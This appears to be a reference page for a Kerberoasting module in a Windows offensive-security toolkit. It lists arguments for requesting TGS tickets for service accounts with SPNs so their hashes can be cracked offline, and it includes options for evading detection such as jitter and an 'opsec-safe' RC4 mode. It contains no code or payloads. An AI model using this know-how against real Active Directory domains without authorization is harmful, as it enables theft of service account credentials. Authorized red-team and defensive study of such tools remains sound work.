Description
Performs Kerberoasting to extract TGS ticket hashes for offline cracking.
Overview
Performs Kerberoasting by requesting TGS tickets for accounts with registered SPNs. The encrypted ticket data can be cracked offline to recover service account passwords. Supports filtering by SPN, user, OU, and various other criteria.
Arguments
| Parameter | Type | Description |
|---|---|---|
| SPN | string | A specific SPN to Kerberoast. |
| User | string | A specific user to Kerberoast. |
| Domain | string | The target domain. Defaults to the current domain. |
| DC | string | The domain controller to target. |
| OU | string | The OU to search within. |
| CredUser | string | Alternate credentials username for LDAP queries. |
| CredPassword | string | Alternate credentials password for LDAP queries. |
| Stats | switch | Display statistics only, do not extract tickets. |
| AES | switch | Request AES encrypted tickets. |
Additional Parameters
- Ticket: Existing TGT to use for requests.
- LdapFilter: Custom LDAP filter.
- PwdSetAfter: Filter accounts with password set after this date.
- PwdSetBefore: Filter accounts with password set before this date.
- ResultLimit: Maximum number of results.
- Delay: Delay in milliseconds between requests.
- Jitter: Jitter percentage for delay randomization.
- Simple: Use simplified output format.
- RC4Opsec: Use RC4 opsec-safe method.
- UseTGTDeleg: Use TGT delegation trick.
- Enterprise: Use enterprise principal names.
- Ldaps: Use LDAPS.
Dependencies
- AD
Operating Systems
- Windows